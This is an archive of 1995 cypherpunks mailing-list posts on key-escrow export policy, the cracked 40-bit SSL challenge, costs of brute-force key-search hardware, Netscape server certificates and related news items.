MIME-Version: 1.0
Content-Type: text


> C-punks:
> 
> This "change" that encryption software can be exported if the keys are
> escrowed means nothing.  PGP still couldn't be exported, since it can
> generate its own keys.  You can be sure that any program that generates
> its own keys couldn't be exported.  How are you going to escrow 2^100
> possible keys (or whatever it is that PGP can generate)?

As I said, for $1 each, I will be happy to escrow all 2^100th keys
for 100 bit PGP.  Send your dollars to the address below:

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Date: Fri, 18 Aug 95 05:35:52 PDT
To: cypherpunks@toad.com
Subject: Rant Generator
Message-ID: <199508181235.IAA10123@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Anybody have the URL of that rant generator that was mentioned here a 
couple of weeks ago. Due to unforeseen circumstances, all my annotations
got lost :(

Thanks,

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"For a privacy advocate to determine
 Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |a death penalty opponent choosing
 I'm not allowed to have an opinion.   |between gas or electricity"-D.Banisar
                                    
  key to UNIX: echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 18 Aug 95 06:45:56 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
Message-ID: <199508181352.IAA28188@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>Ok, let's escrow our keys with Julf :-)
>
>Seriously, there might be a market for somebody to become a professional 
>escrow agent....
>
>(tongue partially in cheek)
>

I will cheerfully escrow keys for 1$ ecash/key. Please be advised, however,
that key storage will be on an old 40M RLL drive on an 8088 machine, so
retrieval may be a bit slow and unreliable.......

Yes, I'm really serious about the fee and storage medium.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Fri, 18 Aug 95 05:52:26 PDT
To: cypherpunks@toad.com
Subject: PRZ Wins One
Message-ID: <70510c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young <jya@pipeline.com> writes:

>    PRZ is awarded a 1995 Chrysler Award for Innovation in
>    Design, says a $40,000 full-page ad in The NYT today, with
>    a brief citation:
> 
>       Philip Zimmermann is the designer of Pretty Good Privacy
>       (PGP), an E-mail encryption software. Thanks to the
>       algorithms of PGP, which was released to the public as
>       free software in 1991, E-mail messages can be sent
>       securely all over the world without the risk of
>       interception by any third party.
> 
>    No mention of the free-world leader's sword poised to
>    decapitalize the public-spirited designer to protect IC
>    hegemony.

No need. The implied vote of support is quite clear.


--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Fri, 18 Aug 95 09:05:02 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508181603.JAA09123@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jordan (jordan@Heuristicrat.COM) attempts to correct me ;-)

> >  From pierre@shell.portal.com Thu Aug 17 18:29:41 1995
> >
> >  Unfortunately, in this case, insecure credit cards are not an
> >  obstacle to banks making money, so why should they care?
>
> [...] if you think that the major card issuers "don't care" about
> cutting (or eliminating) fraud, you're not talking to the right
> people.  Fraud eats away a big chunk of revenue [...]

Creative quoting aside, the point of my post, if it needs further
clarification, was that the cost of fraud is not only a burden to
the banks as some people seem to think. It is not even only transmitted
back to the customers in the form of higher fees and interest rates.

Card issuers can, do, and should as long as they can get away with it,
rely on methods against fraud that are less costly to them. That's
because they answer to their bottom line, to their share holders.
There are disincentives to fraud in the form of legal penalties and
threat of same, even the impression that credit cards are insecure may
help by limiting what (some) people dare to do with them. The costs of
these methods of fighting fraud is carried in part even by us who don't
even usually use credit cards! The highest the penalties and cost of
enforcement, the lowest the direct burden on banks, but that does not
necessarily mean that our (user's) bottom line will improve.

For citizens and tax payers who are not significant share holders, it's
not enough to ask the card issuers what the cost of card insecurity is
to them. "Our cost is higher."

By making some credit card fraud illegal, enforcing, etc... we actually
allow card issuers to use less secure mechanisms and procedures
(although I'll agree this does not apply to the 40 bit key nonsense,
that's one case where banks and businesses would be happy to use longer
keys.) (the equivalent mis-quote about politicians applies here :-)

Pierre.
pierre@shell.portal.com
(And I will not contribute further to this side thread.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harveyrj@vt.edu (R. J. Harvey)
Date: Fri, 18 Aug 95 07:11:45 PDT
To: cypherpunks@toad.com
Subject: Re:  Netscape security
Message-ID: <9508181411.AA11657@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On the subject of Netscape:
   Now that Netscape is making the Commerce Server available
for free to students, faculty, libraries, etc. (i.e., groups
with limited ability to cough-up $290 to RSA to get the 
1-year digitially-signed certificate needed to make it operate 
in "secure mode"), does anyone know of alternative methods for 
producing such certificates?  

rj
------------------------------------------------------
R. J. Harvey                 
                            email: harveyrj@vt.edu
WWW site for job analysis 
& personality research:     http://harvey.psyc.vt.edu/

PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 18 Aug 95 07:26:45 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: NIST Release on Key Escrow
Message-ID: <n1403380943.31911@epic.org>
MIME-Version: 1.0
Content-Type: text/plain



EMBARGOED FOR RELEASE:                  NIST 95-24
3 p.m. EDT, Thursday, Aug. 17, 1995

Contact:  Anne Enright Shepherd         COMMERCE'S NIST ANNOUNCES
          (301) 975-4858                PROCESS FOR DIALOGUE ON
                                        KEY ESCROW ISSUES

     Furthering the Administration's commitment to defining a
workable key escrow encryption strategy that would satisfy
government and be acceptable to business and private users of
cryptography, the Commerce Department's National Institute of
Standards and Technology announced today renewed dialogue on key
escrow issues.

     A Sept. 6-7 workshop will convene industry and government
officials to discuss key escrow issues, including proposed
liberalization of export control procedures for key escrow
software products with key lengths up to 64 bits, which would
benefit software manufacturers interested in building secure
encryption products that can be used both domestically and
abroad.

     Key escrow encryption is part of the Administration's
initiative to promote the use of strong techniques to protect the
privacy of data and voice transmissions by companies, government
agencies and others without compromising the government's ability
to carry out lawful wiretaps.

     In a July 1994 letter to former Rep. Maria Cantwell, Vice
President Gore said that the government would work on developing
exportable key escrow encryption systems that would allow escrow
agents outside the government, not rely on classified algorithms,
be implementable in hardware or software, and meet the needs of
industry as well as law enforcement and national security.  Since
that time, discussions with industry have provided valuable
guidance to the Administration in the development of this policy.
For example, many companies are interested in using a corporate
key escrow system to ensure reliable back-up access to encrypted
information, and the renewed commitment should foster the
development of such services.

     Consideration of additional implementations of key escrow
comes in response to concerns expressed by software industry
representatives that the Administration's key escrow policies did
not provide for a software implementation of key escrow and in
light of the needs of federal agencies for commercial encryption
products in hardware and software to protect unclassified
information on computer and data networks.

     Officials also announced a second workshop at which industry
is invited to help develop additional Federal Information
Processing Standards for key escrow encryption, specifically to
include software implementations.  This standards activity would
provide federal government agencies with wider choices among
approved key escrow encryption products using either hardware or
software.  Federal Information Processing Standards provide
guidance to agencies of the federal government in their
procurement and use of computer systems and equipment.

     Industry representatives and others interested in joining
this standards-development effort are invited to a key escrow
standards exploratory workshop on Sept. 15 in Gaithersburg, Md.
This workshop is an outgrowth of last year's meetings in which
government and industry officials discussed possible technical
approaches to software key escrow encryption.

     The Escrowed Encryption Standard, a Federal Information
Processing Standard for use by federal agencies and available for
use by others, specifies use of a Key Escrow chip (once referred
to as "Clipper chip") to provide strong encryption protection for
sensitive but unclassified voice, fax and modem communications
over telephone lines.  Currently, this hardware-based standard is
the only FIPS-approved key escrow technique.  NIST officials
anticipate proposing a revision to the Escrowed Encryption
Standard to allow it to cover electronic data transmitted over
computer networks.  Under this revised federal standard, the
Capstone chip and other hardware-based key escrow techniques
developed for use in protecting such electronic data also will be
approved for use by federal agencies.

     As a non-regulatory agency of the Commerce Department's
Technology Administration, NIST promotes U.S. economic growth by
working with industry to develop and apply technology,
measurements and standards.

                                 - 30 -

Note to editors:  Readers who are interested in obtaining more
information about the workshops can contact Arlene Carlton,
(301) 975-3240, fax: (301) 948-1784, e-mail: carlton@micf.nist.gov.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Aug 95 07:21:47 PDT
To: cypherpunks@toad.com
Subject: BUK_guv
Message-ID: <199508181421.KAA22725@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-18-95. W$Japer:


   "Encryption-Software Plan Presented Using 'Keys' Held by
   Escrow Agents." [This is a variation on the Markoff article
   today, with a bit more.]

      Companies hoping to start selling stronger encryption
      products will have to wait a few months, since the
      administration has yet to sort out important details.
      For instance, one unresolved issue is how to certify
      escrow agents to keep fly-by-night operators and
      organized-crime figures out of the business. And the
      administration's emerging policy doesn't deal with
      data-security hardware -- products that wire the
      encryption schemes right into chips or other devices.
      Even with the export restrictions, U.S. officials
      haven't been able to stop widespread international
      distribution of an encryption program, called Pretty
      Good Privacy, that is nearly impossible to crack.


   "Seizure of Electronic Messages In Obscenity Case Raises
   Questions."

      Users of a small computer bulletin board in Ohio sued
      local authorities who seized their electronic mail and
      other materials as part of an investigation into obscene
      postings. In their lawsuit, which appears to be the
      first of its kind, the plaintiffs contend that the
      Hamilton County Regional Computer Crimes Task Force and
      other authorities violated their rights to free speech
      and privacy by seizing their messages during a June raid
      of five bulletin boards. The plaintiffs also allege
      that, by seizing their private electronic messages, the
      authorities violated the Electronic Communications
      Privacy Act.


   Double yolk: BUK_guv (about 11kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Aug 95 07:23:45 PDT
To: cypherpunks@toad.com
Subject: 28M_dip
Message-ID: <199508181423.KAA23006@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-17-95. FPeach:


   "Russian 'in $2.8m Citibank computer fraud'."

      Citibank New York fell victim to a $2.8m fraud after a
      Russian computer hacker penetrated the bank's security
      system in Wall Street and removed the money from the
      accounts of corporate clients, it was claimed in a
      London court yesterday. The alleged fraud was carried
      out by a 24 year-old mathematics graduate using a
      computer in his office in St Petersburg, claim the US
      authorities, which are seeking his extradition from the
      UK.


   8-17-95. NYPaper:

   "Russian Accused of Citibank Computer Fraud."

      A judge set another hearing for Sept. 15 after Mr.
      Levin's lawyer argued that the Government has not shown
      that any computer in the United States was involved.



   Stereo: 28M_dip (about 6kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Fri, 18 Aug 95 08:29:19 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Export policy change
In-Reply-To: <199508181352.IAA28188@arnet.arn.net>
Message-ID: <Pine.BSI.3.91.950818102219.6463B-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, David K. Merriman wrote:

> >Ok, let's escrow our keys with Julf :-)
> >
> >Seriously, there might be a market for somebody to become a professional 
> >escrow agent....
> >
> >(tongue partially in cheek)
> >
> 
> I will cheerfully escrow keys for 1$ ecash/key. Please be advised, however,
> that key storage will be on an old 40M RLL drive on an 8088 machine, so
> retrieval may be a bit slow and unreliable.......


Same here -- I have an original Compaq "Sewing Machine" Portable with 
a 40MB hard card.  Of course the HD sticks and needs a good whacking
sometimes, and the last floppy came out of the drive smoking and
covered in grease.  (You DO have a 5 1/4" 360K floppy don't you?)

My service, however is $2.  That's because all keys are encrypted against
my key, which is unfortunately escrowed with the fellow listed above.

Sorry about having to pass along the extra costs. :-)


David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Fri, 18 Aug 95 10:34:33 PDT
To: cypherpunks@toad.com
Subject: Distributed computing
In-Reply-To: <14470.9508181605@exe.dcs.exeter.ac.uk>
Message-ID: <199508181734.KAA03684@emily6.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


This may be more of a computer science question than a cryptography
one, but it seems relevant to the current discussion:

What is the current technology for running large compute-intensive
jobs accross a whole lotta computers?  Specifically, what's the best
way to run something like a big key-cracking job on a farm of
workstations?  Run separate jobs on each machine that check in to a
main server for new keys to crack?  Or is there a better way?

Also, on the note of producing a cheap parallel setup: a simple 90MHz
pentium motherboard is ~$150.  A cheap network card is under $50, and
I'll bet it's possible to build a custom power-supply that'll juice a
whole bunch of motherboards for under $200.  You don't need monitors
or keyboards for these machines -- just one of each to plug into the
various machines to troubleshoot. Thus, the incremental cost of adding
another pentium to a big cracking job is about $200 -- the startup
cost is the cost of the distributed power supply, monitor, keyboard,
etc. plus one server.  And it's even cheaper to build this sort of
setup if you go to someone who knows what s/he is doing, and can put a
whole lotta CPUs onto one motherboard...

The point is, that while one pentium can't do a whole lot, it's pretty
cheap to build a DIY pentium "farm."  And if a whole lot of people
have these farms, and are willing to run distributed cracking jobs on
them, computing power like that of the systems used in the RC40 crack
is very easy to come by.

Finally, there is a factor that hasn't been touched on much yet.
Credit cards are not the crux of the problem: in the years to come,
there will be more and more ways to manipulate money on the net.
Charles Schwab is already working on a way to trade stocks wholesale
over the net (or have they already started?), and I know of a couple
other companies that have plans in the works to do the same.  If it's
possible for a small group to break one of *these* keys in a
relatively short time (a month or two, I suppose), the money at stake
could be well worth the compute time involved.


- -sq

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMDTPE1IP+Y8TPTdtAQGf3wP/f+X6nCvFqnqtdjUv4JqV3AMZVTXaf1At
TCvP8DByrbRH/Yo/1PQvtOkLIcmII1meI0FQjLRsE13EL5KNZoppyAkcCTl5Rr92
bsrHZsZLI3cYry9YZP/m1XthrrZg5ppePIbfOiUzqoCYHCUvqlhJyTRl00Y4lZP4
+mLYuDh1Rps=
=+Tij
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dorab Patel <dorab@twinsun.com>
Date: Fri, 18 Aug 95 10:54:34 PDT
To: cypherpunks@toad.com
Subject: PGP encryption for HTML forms
Message-ID: <199508181754.KAA05661@knee.twinsun.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I've developed a simple protocol for encrypting the submission of HTML
forms using PGP.  I've written up the protocol in an "Internet Draft".
We are distributing two reference implementations (with sources ---
copyrighted, but freely redistributable).  One is a modification to
lynx sources to handle this protocol natively.  The other is a "helper
application" (by Jun Hamano) to do the encryption written in python.
You can get the package via anon ftp.

	ftp://ftp.cs.ucla.edu/pub/sitp.tar.gz

Comments welcome.

Snarf it before it becomes illegal!


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBMDTTYGnoQvE1ROndAQE5dQP/SWII7eR/eFYWsdU6mOilLZautmtS1rb9
kRcifS02p7WS3N3sY+MRu20uuPmuL+f+5rriYWJWVgd//s3jgegs8HGqmRuxVQdL
qMFRmtMB5oUfYkLmTiDebHsksr2YLF+AB8vrBCgXIbgKAcSRF4OStRyXBUeXfZ/3
gp9MiACvXV4=
=PxCp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 18 Aug 95 09:01:32 PDT
To: David Neal <dneal@usis.com>
Subject: Re: Export policy change
Message-ID: <199508181608.LAA29884@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 AM 8/18/95 -0500, you wrote:
>On Fri, 18 Aug 1995, David K. Merriman wrote:
>
>> >Ok, let's escrow our keys with Julf :-)
>> >
>> >Seriously, there might be a market for somebody to become a professional 
>> >escrow agent....
>> >
>> >(tongue partially in cheek)
>> >
>> 
>> I will cheerfully escrow keys for 1$ ecash/key. Please be advised, however,
>> that key storage will be on an old 40M RLL drive on an 8088 machine, so
>> retrieval may be a bit slow and unreliable.......
>
>
>Same here -- I have an original Compaq "Sewing Machine" Portable with 
>a 40MB hard card.  Of course the HD sticks and needs a good whacking
>sometimes, and the last floppy came out of the drive smoking and
>covered in grease.  (You DO have a 5 1/4" 360K floppy don't you?)

Yeah - it's my 'good' fdd. The other one is a 180K :-)

Dave
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 08:04:58 PDT
To: perry@piermont.com
Subject: Re: use PGP for http encryption instead!
In-Reply-To: <199508180329.XAA00456@frankenstein.piermont.com>
Message-ID: <9508181458.AA01838@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| "George P. Magiros" writes:
| > i don't mean to be extremely brash, but couldn't one use PGP to provide
| > encrypted communication with the web.
| 
| You ought to read up on S-HTTP, the expert on said protocol being our
| very own Eric Rescorla...

	PGP support was taken out of the latest SHTTP draft,
apparently because no one had implemented it.  Should someone build a
libSHTTP with PGP support, I suspect it would get back into the spec.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Fri, 18 Aug 95 08:17:33 PDT
To: Damien.Doligez@inria.fr (Damien Doligez)
Subject: Re: Cost to Crack Keys
In-Reply-To: <9508181407.AA07951@couchey.inria.fr>
Message-ID: <199508181501.PAA00845@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

And I think your cost estimate is also too high.  You're assuming
$5000 per system, and that's way too high.

You only need a power supply, a motherboard, a processor, a *tiny*
amount of RAM, a network device of some sort (so you can netboot the
systems), and probably a cheezeball display card; you can put one or
two monitors on a cart if you *really* need one hooked up.

You don't need a disk or disk controller -- it's just something else
to break..

Prices selected by throwing darts at the August Computer Shopper.
There are probably lower ones..

	P120 motherboard + processor:	$1099
	P100 motherboard + processor:	  666

	case & power supply:		  $40
	network card (10base2):		  $40

	4MB memory:			 $160
	VGA display card:		  $29
	keyboard:			  $15

So, one could put together a P100 compute server for about $1000, and
a P120 for about $1400.. the P100 is a better deal at this point.

I suspect that with a little work, you could share power supplies
between multiple motherboards, rack-mount the systems, share
keyboards, etc.  You might need a slightly more expensive LAN card for
netbooting...

That cuts your cost estimate down by a factor of about 3 or better, to
around $350.00

I think your electricity estimate may be a bit low, but electricity is
expensive where I live in the northeast U.S...

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMDSrMrT+rHlVUGpxAQEbpAP/TIvDxLjfcdDdqhM5lIG9KEjeIFDWfgMF
qk8RDE1PtAcYrq8SMjgrZ52KU7gf0t0QPs44ZGSC42ff5Z9gRpBGt7f7Qx8GUhPs
6kMVzmkwX9v0XLjcVC9Z/0f7diymWWfFXHW6HHTnYXseoRdmG3MBaDYWkFLiRQSh
ddGscgV48tg=
=ylld
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Fri, 18 Aug 95 08:08:47 PDT
To: harveyrj@vt.edu (R. J. Harvey)
Subject: Re: Netscape security
In-Reply-To: <9508181411.AA11657@toad.com>
Message-ID: <199508181508.LAA11362@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri Aug 18 10:11:07 1995: you scribbled...
> 
> On the subject of Netscape:
>    Now that Netscape is making the Commerce Server available
> for free to students, faculty, libraries, etc. (i.e., groups
> with limited ability to cough-up $290 to RSA to get the 
> 1-year digitially-signed certificate needed to make it operate 
> in "secure mode"), does anyone know of alternative methods for 
> producing such certificates?  

are you sure that this is a commerce server?  Last I saw, It was only the
Communications server (doesn't have SSL).  I could be wrong though.

...alex...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 08:15:02 PDT
To: harveyrj@vt.edu (R. J. Harvey)
Subject: Re: Netscape security
In-Reply-To: <9508181411.AA11657@toad.com>
Message-ID: <9508181509.AA01916@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	To clear up some apparent confusion: The Commerce server is
not the certificate.  The NSCP Commerce Server is an httpd.
Non-profits and educationals still need to pay Verisign for a
certificate.  They do not need to pay NSCP for a $5,000 web server.

	The certificates must be signed by an approved key signing
agency.  Anyone can produce one; to get it to interact 'securely' with
free netscape browsers you need the certificate to be signed.

	There is no word as to how to become a KSA.  Netscpe has
ignored the question on several occaisons.

Adam

| On the subject of Netscape:
|    Now that Netscape is making the Commerce Server available
| for free to students, faculty, libraries, etc. (i.e., groups
| with limited ability to cough-up $290 to RSA to get the 
| 1-year digitially-signed certificate needed to make it operate 
| in "secure mode"), does anyone know of alternative methods for 
| producing such certificates?  


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle Seaman <lws+@transarc.com>
Date: Fri, 18 Aug 95 08:34:23 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <9508180154.AA02120@euclid.Heuristicrat.COM>
Message-ID: <skB=0EKSMUw880aqY7@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


jordan@Heuristicrat.COM (Jordan Hayes) writes:
> talking to the right people.  Fraud eats away a big chunk of revenue
> and can quite significantly affect competitiveness in a market with
> thin margins.

The credit card market has thin margins?  That's news to me.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harveyrj@vt.edu (R. J. Harvey)
Date: Fri, 18 Aug 95 08:28:23 PDT
To: Alex Tang <altitude@cic.net>
Subject: Re: Netscape security
Message-ID: <9508181528.AA14614@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:08 AM 8/18/95 -0400, Alex Tang wrote:
>On Fri Aug 18 10:11:07 1995: you scribbled...
>> 
>> On the subject of Netscape:
>>    Now that Netscape is making the Commerce Server available
>> for free to students, faculty, libraries, etc. (i.e., groups
>> with limited ability to cough-up $290 to RSA to get the 
>> 1-year digitially-signed certificate needed to make it operate 
>> in "secure mode"), does anyone know of alternative methods for 
>> producing such certificates?  
>
>are you sure that this is a commerce server?  Last I saw, It was only the
>Communications server (doesn't have SSL).  I could be wrong though.
>
>...alex...
>
   Yes, I got an email on it this morning.  Check-out:

  http://home.netscape.com/comprod/server_central/index.html.

rj

------------------------------------------------------
R. J. Harvey                 
                            email: harveyrj@vt.edu
WWW site for job analysis 
& personality research:     http://harvey.psyc.vt.edu/

PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 18 Aug 95 11:28:48 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape security
Message-ID: <9508181832.AA21899@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


 
>Now, I can see calling a MasPar a "parallel supercomputer"; another effort
>at the SSL challenge got the answer about 2 hours before Damien's did,
>and used about 4 days of spare time on the MasPar.  Last time I looked,
>a MasPar was selling for about $150K, though I don't know how big the one
>used on SSL was.  At that price, you could have your own for ~$500/day,
>and ripping off $2000 on a credit card isn't tough in today's automated world.
>Next year - computer time costs half as much.
 
Well, lets put it this way, an MP-2 with 16K processors could attack a 56 bit
key about as fast as a 486 could attack a 40 bit key.   The next generation
MP will be less than an order of magnitude faster, although able to use
more processors.

An MP2 with 1K processors can do 220K crypt(3)/sec.  Now, if it weren't so
darned hard to program one for performance...

One tends to wonder if there are analytical methods to reduce the search
space.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 18 Aug 95 11:35:40 PDT
To: danisch@ira.uka.de
Subject: Re:  Article in Time Magazine
Message-ID: <9508181838.AA22012@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>In the Time Magazine of this week there is an article about a new way
>to make war. Instead of sending bombs, tanks, and soldiers, the
>enemies computers and communication networks are attacked by sending
>viruses and worms and by using backdoors to sabotage the infra structure.

I've been getting flyers from the Armed Forces Communications Electronics
Association (AFCEA) for a symposium on information warfare this fall.
Parts are classified SECRET NOFORN.

(SIGNAL magazine is a good source for basic articles, its the latest rage
in the War Colleges)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Thu, 17 Aug 95 16:46:13 PDT
To: cypherpunks@toad.com
Subject: Re: RC40 and what we still need to do
In-Reply-To: <Pine.ULT.3.91.950817133221.13723B-100000@krypton.mankato.msus.edu>
Message-ID: <199508172345.LAA17758@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am "Robert A. Hayden" and I say ...
> However, I think there is still value in writing the software that will 
> allow cooperation amoung hundreds or thousands of people.  That way, we 
> could harness the space CPU of machines all over the globe and make the 
> cracking of this kind of stuff routine.
> 
> I'd anticipate with proper advertising, easy-to-use software, and 
> little programming knowledge require, we could easily harness 10,000+ 
> machines and a few dozen parallel machines.

A generalised distributed compute server would be powerful, a
participant would only have to compile the server and ensure it's
running.  It would compile and run cracking code only if signed by say
four principal participants.

The central coordinator service would want to send the following
instructions (every communique would be signed & checked):
	1) accept code & run
	2) report progress
	3) stop
	4) some management of keys, where perhaps any 3 principal
	   participant keys could revoke or add others for
	   evolutionary purposes.

Just an idea, probably old.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
         __________
       .- __   / -- -\  __   .  .  .           0
      / <___> ___  |  =8'                    //\/  
    .^| _---_ /   \ =   / \                 \/\
    |o |  =  / o | |   ||  |              ... /
    =0=======0==|  |----|  |=    Another drive by shooting on
     \_\_/    \_\_/   \_\_/         the information super highway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Fri, 18 Aug 95 07:48:18 PDT
To: shamrock@netcom.com
Subject: Re: Where is the key cracking farming software?
Message-ID: <199508181448.AA24966@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995 02:11:00 -0400 you wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>With all the talk about cracking SSL, where is the cracking software?
>Sombody just offered me a six Pentium workstation, if I agree to give it a
>"real workout". I'd like to be able to say: "Sure, will do."

There must be several versions of the code at this point.  The
Cypherpunks release, Damien's release and whoever else wrote some code
to do the chore.  If someone could pass me a pointer to the version
that's best-commented and most understandable (one man's C is another
man's crypto) I'd like to port it to Windows NT and write a simple
installation to install it as a service.
	Perhaps a general-purpose OO bruteforcing library (addition to
Crypto++?) would be a good idea.  Just pass a pointers to the
encrypt() and decrypt() functions to use for this session to the
Cracker object, which in turn takes a number of bits and starts
cracking.:)
	The problem with this is the disparity among out-of-the-box encrypt
and decrypt functions.  But I suppose it's nothing that couldn't be
overcome with wrapper functions.  Just thinking out loud. :)
						Dan
******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





